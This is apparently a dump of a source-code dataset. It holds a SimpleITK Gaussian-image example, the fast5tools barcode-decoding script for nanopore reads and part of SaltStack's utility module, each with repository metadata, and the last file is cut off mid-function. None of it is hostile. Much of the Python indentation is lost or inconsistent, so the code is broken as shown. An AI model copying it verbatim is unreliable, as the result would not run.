Python
|
bsd-3-clause
| 23,340
|
[
"Gaussian",
"RDKit"
] |
02a0582d4d35aa233b358da7b367fd22d54c21c43cfa8d3b30b12ad8ee783061
|
#!/usr/bin/env python
# =========================================================================
#
# Copyright NumFOCUS
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0.txt
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# =========================================================================
from __future__ import print_function
import os
import SimpleITK as sitk
xImg = sitk.Image(256, 256, sitk.sitkFloat32)
yImg = sitk.Image(256, 256, sitk.sitkFloat32)
for y in range(0, xImg.GetSize()[1]):
for x in range(0, xImg.GetSize()[0]):
xImg.SetPixel(x, y, x)
yImg[x, y] = y
sigma = 50
xImg = sitk.Subtract(xImg, xImg.GetSize()[0] / 2)
yImg = yImg - yImg.GetSize()[1] / 2
gaussianImg = sitk.Exp(-1 * (xImg ** 2 + yImg ** 2) / (2.0 * sigma ** 2))
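# Added aside (illustrative; assumes SimpleITK's procedural GaussianSource
# wrapper, available in recent releases): a comparable blob in one call.
blobImg = sitk.GaussianSource(sitk.sitkFloat32, size=[256, 256],
                              sigma=[sigma, sigma], mean=[128, 128],
                              scale=1.0)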
if ("SITK_NOSHOW" not in os.environ):
sitk.Show(gaussianImg, "Gaussian Blob")
|
blowekamp/SimpleITK
|
Examples/Python/ImageCreateAndSet.py
|
Python
|
apache-2.0
| 1,323
|
[
"Gaussian"
] |
7102a13b3cb064b7ff7fed93d04b9f083c7a131d20c56ad0fa168315661300c7
|
#!/usr/bin/env python2.7
import h5py, os, sys, argparse
import cStringIO as StringIO
from Bio import SeqIO
from fast5tools.f5class import *
from fast5tools.barcodeclass import *
from fast5tools.f5ops import *
from fast5tools.barcodeops import *
from fast5tools.helperops import *
from glob import glob
#################################################
## Argument Parser
#################################################
parser = argparse.ArgumentParser(description = """
Given path(s) to fast5 file(s) and/or directories of fast5s,
return info on barcodes.
Running time is proportional to barcode lengths and the specified search lengths along reads.
That needs to be balanced with the fact that longer barcodes will perform better.
John Urban (2015, 2016, 2017)
Originally planned with Mark Howison, Dave Berebaum, Chip Lawrence, and Taehee Lee
Originally implemented by Mark and Dave in separate scripts.
Re-implemented and expanded upon as part of Fast5 tools by John.
""", formatter_class = argparse.RawTextHelpFormatter)
parser.add_argument('fast5', metavar='fast5', nargs='+',
type= str,
help='''Paths to as many fast5 files and/or directories filled with fast5 files as you want.
Assumes all fast5 files have '.fast5' extension.
If inside dir of dirs with .fast5 files, then can just do "*" to get all files from all dirs.''')
parser.add_argument('-r', '--readtype', default="template",
type= str,
help='''Choose type of fasta to get.
Choices: 'template', 'complement', '2d'.
Default: template.''')
parser_barcode = parser.add_mutually_exclusive_group(required=True)
parser_barcode.add_argument('-b', '--barcodetable', type=str, default=False,
help='''Path to file with barcode names and sequences.
This can be any tab-separated table file.
Name and sequence are expected to be in column 3 and 5 by default.
Change columns using barcolumns option.
Lines starting with # (e.g. header) are ignored.''')
parser_barcode.add_argument('-B', '--barcodefasta', type=str, default=False,
help='''Path to fasta file with barcode names and sequences.''')
parser.add_argument('--barcolumns', type=str, default='3,5',
help='''If using a barcode table file, define which colums have the barcode name and sequence.
Provide comma-separated, 1-based pair of columns.
Default: 3,5''')
parser.add_argument('--barstart', type=int, default=0, help='''Start location within read sequence to begin searching for barcode.
Can also think about this option as how much of the read to clip off or ignore in the search.
Default: 0.
We have used 60 as well to ignore adapter sequences that remain.''')
parser.add_argument('--barlength', type=int, default=False, help='''Expected maximum length of barcodes.
By default, barlength is detected as longest barcode sequence.
Specifying this gives a hard/constant number to use.
It is best to ensure it is at least as long as the longest barcode.
This needs to be higher than barmin option, else barmin is returned.''')
parser.add_argument('--barflank', type=int, default=False, help='''Amount of extra sequence to add on to barlength.
By default, barlength is detected as longest barcode sequence.
By default, the amount of flank or extra sequence length to search is the given or detected barlength (i.e. search len = 2*barlen).
Specifying this gives a hard/constant number to use.''')
parser.add_argument('--barmin', type=int, default=100, help='''Absolute minimum length to use for barcode search. Default: 100''')
parser.add_argument('--match', type=int, default=4, help='''Match parameter. Should be >= 0. Default: 4.
After lots of messing around, using 4/-2/-1/-1 seemed to work well.
Original settings were 1,-1,-1,-1 somewhat modeled after BWA ont2d type.
However, in Jain et al paper indels cause ~10 pct error and subs cause ~5 pct - meaning when trying to align it here gaps should be penalized less than mismatches.
Also, increasing the match reward encouraged the alignments to cover larger parts of barcodes, allowing better discrimination.
The --full_query option of python swalign attempts to do this, but with some weird results - so I think this is better.''')
parser.add_argument('--mismatch', type=int, default=-2, help='''Mismatch penalty. Should be <= 0. Default: -2.''')
parser.add_argument('--gap_open', type=int, default=-1, help='''Gap open penalty. Should be <= 0.Default: -1.''')
parser.add_argument('--gap_ext', type=int, default=-1, help='''Gap extension penalty. Should be <= 0.Default: -1.''')
parser.add_argument('--gap_decay', type=int, default=0, help='''Gap extend decay parameter. Should be >= 0. Default: 0.''')
parser_alntype = parser.add_mutually_exclusive_group()
parser_alntype.add_argument('--global_aln', action='store_true', default=False, help='''Default is local smith-waterman alignment. Set this to use global alignment as implemented in swalign.
Experimental. Cannot use with --full_query.
This is not recommended, especially with large search spaces for barcodes -- as barcodes begin to look equally unlikely.''')
parser_alntype.add_argument('--full_query', action='store_true', default=False, help='''Default is local smith-waterman alignment. Set this to use full query alignment as implemented in swalign.
Experimental. Cannot use with --global_aln.
This is not recommended as it seems to give weird results.
Instead try setting the match/mismatch/gap parameters to encourage full barcode alignments - which I attempted to do aready.''')
parser.add_argument('--maxscore', action='store_true', default=False, help='''By default read name and max score probability returned. Add max score to output.''')
parser.add_argument('--meanscore', action='store_true', default=False, help='''By default read name and max score probability returned. Add mean score to output.''')
parser.add_argument('--allscores', action='store_true', default=False, help='''By default read name and max score probability returned. Add all scores to output.''')
parser.add_argument('--allprobs', action='store_true', default=False, help='''By default read name and max score probability returned. Add all probabilities to output.''')
parser.add_argument('--barcode_coords', action='store_true', default=False, help='''By default read name and max score probability returned. Add the start and end coordinates of barcode in alignment.''')
parser.add_argument('--read_coords', action='store_true', default=False, help='''By default read name and max score probability returned. Add the start and end coordinates of read in alignment.''')
parser.add_argument('--cigar', action='store_true', default=False, help='''By default read name and max score probability returned. Add cig string from swalign.''')
parser.add_argument('-s', '--sequence', action='store_true', default=False, help='''Add read sequence to output.''')
parser.add_argument('-q', '--quals', action='store_true', default=False, help='''Add qual string to output.''')
parser.add_argument('-C', '--compute_other_probs', action='store_true', default=False, help='''Typically only barcode with highest marginalized AS probabilities reported.
This will report highest probability barcode for a few different metrics.''')
## When two different barcodes are expected in a row at 5' end
parser_barcode2 = parser.add_mutually_exclusive_group()
parser_barcode2.add_argument('--barcodetable2', type=str, default=False,
help='''When two different barcodes are expected in a row at 5' end.''')
parser_barcode2.add_argument('--barcodefasta2', type=str, default=False,
help='''When two different barcodes are expected in a row at 5' end.''')
parser.add_argument('--barstart2', type=int, default=0, help='''Start location within read sequence to begin searching for the second barcode.
Default: 0.
Will use match, mismatch, gap, barcolumns, barlength, barflank, and barmin parameters from barcode1.''')
## Search both ends
parser.add_argument('--bothstrands', action='store_true', default=False, help='''Search both strands of read for barcodes.
This will actually reverse complement the end of reads (only the amount of search length needed), and look for barcodes in them.''')
##parser.add_argument('--revbaroffset', type=int, default=0, help='''By default, when looking for barcodes on the bottom strand,
##it will just look from -search_length until the end. This tells it to go back farther. However, for now, it will still search all the way until the end,
##unless --revsearchlenonly is specified.''')
##parser.add_argument('--revsearchlenonly', action='store_true', default=False, help='''When looking on bottom strand using offset,
##do not go until end - only look as much as search len....''')
parser.add_argument('-c', '--comments', type=str, default=False, help='''Add fast5 info to output.
Default: no comments/False.
Leave any desired string here (you may need to enclose it in quotes if there are spaces).
Alternatively, specify one of the following options:
base_info
pore_info
read_stats
event_stats
read_event_stats
''')
parser.add_argument('-H', '--header', action='store_true', default=False, help='''Add header with hashtag in front (#). Use --nohash to just get header free of hashtag.''')
parser.add_argument('--nohash', action='store_true', default=False, help='''Do not put # in front of header.''')
parser.add_argument('-S', '--samflag', action='store_true', default=False, help='''Add sam flag to comments.''')
parser.add_argument('--minlen', type=int, default=0, help='''Only report reads >= minlen. Default: 0 bp.''')
parser.add_argument('--maxlen', type=int, default=int(3e9), help='''Only report reads <= maxlen. Default: 3 billion bp.''')
parser.add_argument('--minq', type=float, default=0, help='''Only report reads with mean quality scores >= Q. Default: 0.''')
parser.add_argument('--maxq', type=float, default=int(10e3), help='''Only report reads with mean quality scores <= Q.
Default: 10000 (this is orders of magnitude higher than normal max which are always < 20)''')
parser.add_argument('-a', '--abspath', action='store_true', default=False, help='''By default fast5 files are identified by their name minus the .fast5 extension.
Using this option replaces that default with absolute path of their location.
Note: this works best if the fast5s are located in sub-directories as per python os.path.abspath limitations.''')
##parser.add_argument('-o', '--outprefix', default="fast5_sw_bardecoded",
## type= str,
## help='''Choose an outprefix for files generated. Default: fast5_sw_bardecoded''')
parser.add_argument('--outfile', type=str, default=False, help='''Default is to print to stdout. This will redirect into a file.''')
parser.add_argument('--notarlite', action='store_true', default=False, help=''' The default method (called tarlite) extracts 1 file from a given tarchive at a time, processes, and deletes it.
This option says to turn tarlite off, resulting in extracting the entire tarchive before proceeding (and finally deleting).
It is possible that --notarlite is faster, but at the expense of exceeding file number limits or disk storage quotas.
Nonetheless, the difference in speed is a lot smaller than the difference in space needed.
For example, not using tarlite will require >2*tarchive amount of disk space (i.e. the tar.gz and its extracted contents).
The tarlite method only requires the disk space already taken by the tarchive and enough for 1 additional file at a time.
A corollary is that tarlite just needs to be allowed to form 1 (or a few) files compared to what could be thousands to millions.
''')
parser.add_argument('--tarlite', action='store_true', default=False, help='''This legacy option is outdated.
However, it is kept here to avoid breaking pipelines that make use of it.
The tarlite approach is now default. Specifying this will not change that default behavior.
It will just prevent pipelines from breaking.
However, not specifying this will still also result in the tarlite approach.
Use --notarlite to turn it off.''')
## TODO:
## 1. Test option -- provide full length known sequences. When barcode is chosen, alignment score of entire read
## against entire known sequence is then computed (as well as maybe coordinates of the alignment)...
## Perhaps global options will be used...
## 2. Accept adapter sequences to trim off before barcode alignment OR to use with the barcode alignment.
args = parser.parse_args()
#################################################
## Require read type to be set correctly
#################################################
args.readtype = assert_readtype(args.readtype, legaloptions="tc2")
#################################################
## Obtain barcodes
#################################################
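# Added illustration (not part of the original script): a standalone sketch of
# the swalign calls that get_alignment_object presumably wraps, using the
# default scoring from the options above. The helper name is hypothetical.
def _demo_swalign(match=4, mismatch=-2, gap_open=-1, gap_ext=-1):
    import swalign
    scoring = swalign.NucleotideScoringMatrix(match, mismatch)
    aligner = swalign.LocalAlignment(scoring, gap_penalty=gap_open,
                                     gap_extension_penalty=gap_ext)
    # align a short barcode-like query against a read prefix
    return aligner.align('ACGTACGT', 'TTACGTACGTAA')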
#################################################
#### EXECUTE @@@@@@@@@@@@
#################################################
if __name__ == "__main__":
## print to stdout?
if not args.outfile:
OUT = sys.stdout
else:
OUT = open(args.outfile, 'w')
## For now, this is controlled to grab the fastq with only the filename
if args.abspath:
output = get_fast5tofastx_output_fxn('fastq_only_abspath')
else:
output = get_fast5tofastx_output_fxn('fastq_only_filename')
getread = get_fast5tofastx_readtype_fxn(args.readtype)
#get barcodes and search parameters
barcodes = read_in_barcodes(barcodetable=args.barcodetable, barcodefasta=args.barcodefasta, barcolumns=args.barcolumns)
search_len = get_barcode_search_length(barcodes, barlength=args.barlength, barflank=args.barflank, minbarlen=args.barmin)
search_start = args.barstart
search_end = search_start + search_len
## Two positive strand barcodes True?
two_pos_barcodes = args.barcodetable2 or args.barcodefasta2
if two_pos_barcodes:
barcodes2 = read_in_barcodes(barcodetable=args.barcodetable2, barcodefasta=args.barcodefasta2, barcolumns=args.barcolumns)
search_start2 = args.barstart2
search_end2 = search_start2 + search_len
#Looking on both strands? Then rev comp barcodes
if args.bothstrands:
revbarcodes = rev_comp_seq_dict(barcodes)
rev_search_end = -search_start
if two_pos_barcodes:
revbarcodes2 = rev_comp_seq_dict(barcodes2)
#create alignment objects
sw = get_alignment_object(args.match, args.mismatch, args.gap_open, args.gap_ext, args.gap_decay, verbose=False, globalalign=args.global_aln, full_query=args.full_query)
# interpret sam flag arg
samflag=''
if args.samflag:
samflag = 'F5:Z:'
# What to print from best alignment
# always give name and probability
get = [0,1]
header = ['readname']
headeradds = ['barcode', 'probability']
if args.maxscore:
get.append( 2 )
headeradds.append('maxscore')
if args.meanscore:
get.append( 3 )
headeradds.append('meanscore')
if args.allscores:
get.append( 4 )
headeradds.append('allscores')
if args.allprobs:
get.append( 5 )
headeradds.append('allprobs')
if args.barcode_coords:
get.append( 6 )
get.append( 7 )
headeradds.append('bc_start')
headeradds.append('bc_end')
if args.read_coords:
get.append( 8 )
get.append( 9 )
headeradds.append('read_start')
headeradds.append('read_end')
if args.cigar:
get.append( 10 )
headeradds.append('cigar')
if args.compute_other_probs:
headeradds.append('barcode2')
headeradds.append('p_minion')
headeradds.append('barcode3')
headeradds.append('p_minion_scaled')
headeradds.append('barcode4')
headeradds.append('p_binomial')
for add in headeradds:
header.append( 'set1_topstrand_' + add )
if two_pos_barcodes:
for add in headeradds:
header.append( 'set2_topstrand_' + add )
if args.bothstrands:
for add in headeradds:
header.append( 'set1_bottomstrand_' + add )
if two_pos_barcodes:
for add in headeradds:
header.append( 'set2_bottomstrand_' + add )
if args.comments:
header.append( 'f5info' )
if args.sequence:
header.append('f5_sequence')
if args.quals:
header.append('f5_quals')
## Set these to empty
seq=[]
quals=[]
aln2 = []
revaln1 = []
revaln2 = []
otherprobs1 = []
otherprobs2 = []
revotherprobs1 = []
revotherprobs2 = []
#HEADER?
if args.header:
if not args.nohash:
header[0] = '#'+header[0]
OUT.write( ('\t').join(header) + '\n' )
# execute for loop
for f5 in Fast5List(args.fast5, keep_tar_footprint_small=(not args.notarlite)):
if f5.is_not_corrupt() and f5.is_nonempty:
read = getread(f5, args.minlen, args.maxlen, args.minq, args.maxq, output, comments=args.comments, samflag=samflag)
if read:
#Remove '@' from name and newline from end while breaking fastq up into list of 4 fields.
read = read[1:].strip().split('\n')
            # Split on the first whitespace only, so comments that themselves
            # contain spaces are kept intact instead of being silently dropped.
            name = read[0].split(None, 1)
            readname = [name[0]]
            comments = [name[1]] if len(name) == 2 else []
if args.sequence:
seq = [read[1]]
if args.quals:
quals = [read[3]]
# Look for first (maybe only) barcode on top strand
bcaln = BarcodeChoice(barcodes, sw, read[1], search_start, search_end, ref_name=read[0], use_entire_barcode=True, compute_all=args.compute_other_probs)
aln1 = [str(e) for e in bcaln.get_subset_maxbar_list(get)]
if args.compute_other_probs:
otherprobs1 = [str(e) for e in [bcaln.maxminionbar['p_minion'], bcaln.maxminion['p_minion'], bcaln.maxminionbar['norm_p_minion'], bcaln.maxminion['norm_p_minion'], bcaln.maxbinombar[1], bcaln.maxbinom[1]]]
## all I added were the probs that include unaligned portions -- can also add probs with only aligned portions... but it seems too much
# If opted, look for second barcode on top strand
if two_pos_barcodes:
bcaln2 = BarcodeChoice(barcodes2, sw, read[1], search_start2, search_end2, ref_name=read[0], use_entire_barcode=True, compute_all=args.compute_other_probs)
aln2 = [str(e) for e in bcaln2.get_subset_maxbar_list(get)]
                if args.compute_other_probs:
                    otherprobs2 = [str(e) for e in [bcaln2.maxminionbar['p_minion'], bcaln2.maxminion['p_minion'], bcaln2.maxminionbar['norm_p_minion'], bcaln2.maxminion['norm_p_minion'], bcaln2.maxbinombar[1], bcaln2.maxbinom[1]]]
# Potentially look at the bottom strand by using reverse complement barcodes
if args.bothstrands:
revcompseq = revcomp(read[1][-search_end:])
revbcaln = BarcodeChoice(barcodes, sw, revcompseq, search_start, search_end, ref_name='revcomp_'+read[0], use_entire_barcode=True, compute_all=args.compute_other_probs)
revaln1 = [str(e) for e in revbcaln.get_subset_maxbar_list(get)]
                if args.compute_other_probs:
                    revotherprobs1 = [str(e) for e in [revbcaln.maxminionbar['p_minion'], revbcaln.maxminion['p_minion'], revbcaln.maxminionbar['norm_p_minion'], revbcaln.maxminion['norm_p_minion'], revbcaln.maxbinombar[1], revbcaln.maxbinom[1]]]
# If opted, look for second barcode on top strand
if two_pos_barcodes:
revbcaln2 = BarcodeChoice(barcodes2, sw, revcompseq, search_start2, search_end2, ref_name='revcomp_'+read[0], use_entire_barcode=True, compute_all=args.compute_other_probs)
revaln2 = [str(e) for e in revbcaln2.get_subset_maxbar_list(get)]
                    if args.compute_other_probs:
                        revotherprobs2 = [str(e) for e in [revbcaln2.maxminionbar['p_minion'], revbcaln2.maxminion['p_minion'], revbcaln2.maxminionbar['norm_p_minion'], revbcaln2.maxminion['norm_p_minion'], revbcaln2.maxbinombar[1], revbcaln2.maxbinom[1]]]
out = ('\t').join( readname + aln1 + otherprobs1 + aln2 + otherprobs2 + revaln1 + revotherprobs1 + revaln2 + revotherprobs2 + comments + seq + quals)
OUT.write( out + '\n' )
    ## close the output file if one was opened
if args.outfile:
OUT.close()
|
JohnUrban/fast5tools
|
bin/fast5_sw_bardecoder.py
|
Python
|
mit
| 20,901
|
[
"BWA"
] |
2d615b04c547e7d83f72cdecc16c6cc779211f58c0f805526c3d5e1c094f2504
|
# -*- coding: utf-8 -*-
'''
Some of the utils used by salt
'''
# Import python libs
from __future__ import absolute_import, division, print_function
import contextlib
import copy
import collections
import datetime
import distutils.version # pylint: disable=import-error,no-name-in-module
import errno
import fnmatch
import hashlib
import imp
import json
import logging
import numbers
import os
import pprint
import random
import re
import shlex
import shutil
import socket
import stat
import sys
import pstats
import tempfile
import time
import types
import warnings
import string
import subprocess
# Import 3rd-party libs
from salt.ext import six
# pylint: disable=import-error
from salt.ext.six.moves.urllib.parse import urlparse # pylint: disable=no-name-in-module
# pylint: disable=redefined-builtin
from salt.ext.six.moves import range
from salt.ext.six.moves import zip
from salt.ext.six.moves import map
from stat import S_IMODE
# pylint: enable=import-error,redefined-builtin
try:
import cProfile
HAS_CPROFILE = True
except ImportError:
HAS_CPROFILE = False
# Import 3rd-party libs
try:
import Crypto.Random
HAS_CRYPTO = True
except ImportError:
HAS_CRYPTO = False
try:
import timelib
HAS_TIMELIB = True
except ImportError:
HAS_TIMELIB = False
try:
import parsedatetime
HAS_PARSEDATETIME = True
except ImportError:
HAS_PARSEDATETIME = False
try:
import fcntl
HAS_FCNTL = True
except ImportError:
# fcntl is not available on windows
HAS_FCNTL = False
try:
import win32api
HAS_WIN32API = True
except ImportError:
HAS_WIN32API = False
try:
import grp
HAS_GRP = True
except ImportError:
# grp is not available on windows
HAS_GRP = False
try:
import pwd
HAS_PWD = True
except ImportError:
# pwd is not available on windows
HAS_PWD = False
try:
import setproctitle
HAS_SETPROCTITLE = True
except ImportError:
HAS_SETPROCTITLE = False
try:
import ctypes
import ctypes.util
libc = ctypes.cdll.LoadLibrary(ctypes.util.find_library("c"))
res_init = libc.__res_init
HAS_RESINIT = True
except (ImportError, OSError, AttributeError):
HAS_RESINIT = False
# Import salt libs
from salt.defaults import DEFAULT_TARGET_DELIM
import salt.defaults.exitcodes
import salt.log
import salt.version
from salt.utils.decorators import memoize as real_memoize
from salt.textformat import TextFormat
from salt.exceptions import (
CommandExecutionError, SaltClientError,
CommandNotFoundError, SaltSystemExit,
SaltInvocationError
)
log = logging.getLogger(__name__)
_empty = object()
def safe_rm(tgt):
'''
Safely remove a file
'''
try:
os.remove(tgt)
except (IOError, OSError):
pass
def is_empty(filename):
'''
Is a file empty?
'''
try:
return os.stat(filename).st_size == 0
except OSError:
# Non-existent file or permission denied to the parent dir
return False
def is_hex(value):
'''
Returns True if value is a hexidecimal string, otherwise returns False
'''
try:
int(value, 16)
return True
except (TypeError, ValueError):
return False
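# Illustrative usage of is_hex (editor's examples, not part of the original
# module; note that int(value, 16) also accepts an '0x' prefix):
#
#     >>> is_hex('deadBEEF')
#     True
#     >>> is_hex('0x10')
#     True
#     >>> is_hex('xyz')
#     False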
def get_color_theme(theme):
'''
Return the color theme to use
'''
# Keep the heavy lifting out of the module space
import yaml
if not os.path.isfile(theme):
        log.warning('The named theme {0} is not available'.format(theme))
    try:
        with fopen(theme, 'rb') as fp_:
            colors = yaml.safe_load(fp_.read())
        # Validate the loaded data before iterating over it; a non-dict theme
        # file would otherwise blow up inside the loop below.
        if not isinstance(colors, dict):
            log.warning('The theme file {0} is not a dict'.format(theme))
            return {}
        ret = {}
        for color in colors:
            ret[color] = '\033[{0}m'.format(colors[color])
        return ret
    except Exception:
        log.warning('Failed to read the color theme {0}'.format(theme))
        return {}
def get_colors(use=True, theme=None):
'''
Return the colors as an easy to use dict. Pass `False` to deactivate all
colors by setting them to empty strings. Pass a string containing only the
name of a single color to be used in place of all colors. Examples:
.. code-block:: python
colors = get_colors() # enable all colors
no_colors = get_colors(False) # disable all colors
red_colors = get_colors('RED') # set all colors to red
'''
colors = {
'BLACK': TextFormat('black'),
'DARK_GRAY': TextFormat('bold', 'black'),
'RED': TextFormat('red'),
'LIGHT_RED': TextFormat('bold', 'red'),
'GREEN': TextFormat('green'),
'LIGHT_GREEN': TextFormat('bold', 'green'),
'YELLOW': TextFormat('yellow'),
'LIGHT_YELLOW': TextFormat('bold', 'yellow'),
'BLUE': TextFormat('blue'),
'LIGHT_BLUE': TextFormat('bold', 'blue'),
'MAGENTA': TextFormat('magenta'),
'LIGHT_MAGENTA': TextFormat('bold', 'magenta'),
'CYAN': TextFormat('cyan'),
'LIGHT_CYAN': TextFormat('bold', 'cyan'),
'LIGHT_GRAY': TextFormat('white'),
'WHITE': TextFormat('bold', 'white'),
'DEFAULT_COLOR': TextFormat('default'),
'ENDC': TextFormat('reset'),
}
if theme:
colors.update(get_color_theme(theme))
if not use:
for color in colors:
colors[color] = ''
if isinstance(use, str):
# Try to set all of the colors to the passed color
if use in colors:
for color in colors:
# except for color reset
if color == 'ENDC':
continue
colors[color] = colors[use]
return colors
def get_context(template, line, num_lines=5, marker=None):
'''
Returns debugging context around a line in a given string
Returns:: string
'''
template_lines = template.splitlines()
num_template_lines = len(template_lines)
# in test, a single line template would return a crazy line number like,
# 357. do this sanity check and if the given line is obviously wrong, just
# return the entire template
if line > num_template_lines:
return template
    context_start = max(0, line - num_lines - 1)  # subtract 1 for 0-based indexing
    context_end = min(num_template_lines, line + num_lines)
    error_line_in_context = line - context_start - 1  # subtract 1 for 0-based indexing
buf = []
if context_start > 0:
buf.append('[...]')
error_line_in_context += 1
buf.extend(template_lines[context_start:context_end])
if context_end < num_template_lines:
buf.append('[...]')
if marker:
buf[error_line_in_context] += marker
# warning: jinja content may contain unicode strings
# instead of utf-8.
buf = [to_str(i) if isinstance(i, six.text_type) else i for i in buf]
return '---\n{0}\n---'.format('\n'.join(buf))
def get_user():
'''
Get the current user
'''
if HAS_PWD:
return pwd.getpwuid(os.geteuid()).pw_name
else:
return win32api.GetUserName()
def get_uid(user=None):
"""
Get the uid for a given user name. If no user given,
the current euid will be returned. If the user
does not exist, None will be returned. On
systems which do not support pwd or os.geteuid
it will return None.
"""
if not HAS_PWD:
result = None
elif user is None:
try:
result = os.geteuid()
except AttributeError:
result = None
else:
try:
u_struct = pwd.getpwnam(user)
except KeyError:
result = None
else:
result = u_struct.pw_uid
return result
def get_gid(group=None):
"""
Get the gid for a given group name. If no group given,
the current egid will be returned. If the group
does not exist, None will be returned. On
systems which do not support grp or os.getegid
it will return None.
"""
    if not HAS_GRP:
result = None
elif group is None:
try:
result = os.getegid()
except AttributeError:
result = None
else:
try:
g_struct = grp.getgrnam(group)
except KeyError:
result = None
else:
result = g_struct.gr_gid
return result
def _win_user_token_is_admin(user_token):
'''
Using the win32 api, determine if the user with token 'user_token' has
administrator rights.
See MSDN entry here:
http://msdn.microsoft.com/en-us/library/aa376389(VS.85).aspx
'''
class SID_IDENTIFIER_AUTHORITY(ctypes.Structure):
_fields_ = [
("byte0", ctypes.c_byte),
("byte1", ctypes.c_byte),
("byte2", ctypes.c_byte),
("byte3", ctypes.c_byte),
("byte4", ctypes.c_byte),
("byte5", ctypes.c_byte),
]
nt_authority = SID_IDENTIFIER_AUTHORITY()
nt_authority.byte5 = 5
SECURITY_BUILTIN_DOMAIN_RID = 0x20
DOMAIN_ALIAS_RID_ADMINS = 0x220
administrators_group = ctypes.c_void_p()
if ctypes.windll.advapi32.AllocateAndInitializeSid(
ctypes.byref(nt_authority),
2,
SECURITY_BUILTIN_DOMAIN_RID,
DOMAIN_ALIAS_RID_ADMINS,
0, 0, 0, 0, 0, 0,
ctypes.byref(administrators_group)) == 0:
raise Exception("AllocateAndInitializeSid failed")
try:
is_admin = ctypes.wintypes.BOOL()
if ctypes.windll.advapi32.CheckTokenMembership(
user_token,
administrators_group,
ctypes.byref(is_admin)) == 0:
raise Exception("CheckTokenMembership failed")
return is_admin.value != 0
finally:
ctypes.windll.advapi32.FreeSid(administrators_group)
def _win_current_user_is_admin():
'''
ctypes.windll.shell32.IsUserAnAdmin() is intentionally avoided due to this
function being deprecated.
'''
return _win_user_token_is_admin(0)
def get_specific_user():
'''
    Get a user name for publishing. If the user is 'root', attempt to be
    more specific.
'''
user = get_user()
if is_windows():
if _win_current_user_is_admin():
return 'sudo_{0}'.format(user)
else:
env_vars = ('SUDO_USER',)
if user == 'root':
for evar in env_vars:
if evar in os.environ:
return 'sudo_{0}'.format(os.environ[evar])
return user
def reinit_crypto():
'''
    When a fork arises, pycrypto needs to reinit
From its doc::
Caveat: For the random number generator to work correctly,
you must call Random.atfork() in both the parent and
child processes after using os.fork()
'''
if HAS_CRYPTO:
Crypto.Random.atfork()
def daemonize(redirect_out=True):
'''
Daemonize a process
'''
try:
pid = os.fork()
if pid > 0:
# exit first parent
reinit_crypto()
sys.exit(salt.defaults.exitcodes.EX_OK)
except OSError as exc:
log.error(
'fork #1 failed: {0} ({1})'.format(exc.errno, exc.strerror)
)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
# decouple from parent environment
os.chdir('/')
# noinspection PyArgumentList
os.setsid()
    os.umask(0o022)
# do second fork
try:
pid = os.fork()
if pid > 0:
reinit_crypto()
sys.exit(salt.defaults.exitcodes.EX_OK)
except OSError as exc:
log.error(
'fork #2 failed: {0} ({1})'.format(
exc.errno, exc.strerror
)
)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
reinit_crypto()
# A normal daemonization redirects the process output to /dev/null.
# Unfortunately when a python multiprocess is called the output is
# not cleanly redirected and the parent process dies when the
# multiprocessing process attempts to access stdout or err.
if redirect_out:
with fopen('/dev/null', 'r+') as dev_null:
os.dup2(dev_null.fileno(), sys.stdin.fileno())
os.dup2(dev_null.fileno(), sys.stdout.fileno())
os.dup2(dev_null.fileno(), sys.stderr.fileno())
def daemonize_if(opts):
'''
Daemonize a module function process if multiprocessing is True and the
process is not being called by salt-call
'''
if 'salt-call' in sys.argv[0]:
return
if not opts.get('multiprocessing', True):
return
if sys.platform.startswith('win'):
return
daemonize(False)
def profile_func(filename=None):
'''
Decorator for adding profiling to a nested function in Salt
'''
def proffunc(fun):
def profiled_func(*args, **kwargs):
logging.info('Profiling function {0}'.format(fun.__name__))
try:
profiler = cProfile.Profile()
retval = profiler.runcall(fun, *args, **kwargs)
profiler.dump_stats((filename or '{0}_func.profile'
.format(fun.__name__)))
except IOError:
logging.exception(
'Could not open profile file {0}'.format(filename)
)
return retval
return profiled_func
return proffunc
def rand_str(size=9999999999, hash_type=None):
'''
Return a random string
'''
if not hash_type:
hash_type = 'md5'
hasher = getattr(hashlib, hash_type)
return hasher(str(random.SystemRandom().randint(0, size))).hexdigest()
def which(exe=None):
'''
Python clone of /usr/bin/which
'''
def _is_executable_file_or_link(exe):
        # checking os.X_OK alone doesn't suffice because a directory may be executable
return (os.access(exe, os.X_OK) and
(os.path.isfile(exe) or os.path.islink(exe)))
if exe:
if _is_executable_file_or_link(exe):
# executable in cwd or fullpath
return exe
ext_list = os.environ.get('PATHEXT', '.EXE').split(';')
@real_memoize
def _exe_has_ext():
'''
Do a case insensitive test if exe has a file extension match in
PATHEXT
'''
for ext in ext_list:
try:
pattern = r'.*\.' + ext.lstrip('.') + r'$'
re.match(pattern, exe, re.I).groups()
return True
except AttributeError:
continue
return False
# Enhance POSIX path for the reliability at some environments, when $PATH is changing
# This also keeps order, where 'first came, first win' for cases to find optional alternatives
search_path = os.environ.get('PATH') and os.environ['PATH'].split(os.pathsep) or list()
for default_path in ['/bin', '/sbin', '/usr/bin', '/usr/sbin', '/usr/local/bin']:
if default_path not in search_path:
search_path.append(default_path)
os.environ['PATH'] = os.pathsep.join(search_path)
for path in search_path:
full_path = os.path.join(path, exe)
if _is_executable_file_or_link(full_path):
return full_path
elif is_windows() and not _exe_has_ext():
# On Windows, check for any extensions in PATHEXT.
# Allows both 'cmd' and 'cmd.exe' to be matched.
for ext in ext_list:
# Windows filesystem is case insensitive so we
# safely rely on that behavior
if _is_executable_file_or_link(full_path + ext):
return full_path + ext
log.trace('\'{0}\' could not be found in the following search path: \'{1}\''.format(exe, search_path))
else:
log.error('No executable was passed to be searched by salt.utils.which()')
return None
def which_bin(exes):
'''
Scan over some possible executables and return the first one that is found
'''
if not isinstance(exes, collections.Iterable):
return None
for exe in exes:
path = which(exe)
if not path:
continue
return path
return None
def activate_profile(test=True):
pr = None
if test:
if HAS_CPROFILE:
pr = cProfile.Profile()
pr.enable()
else:
log.error('cProfile is not available on your platform')
return pr
def output_profile(pr, stats_path='/tmp/stats', stop=False, id_=None):
if pr is not None and HAS_CPROFILE:
try:
pr.disable()
if not os.path.isdir(stats_path):
os.makedirs(stats_path)
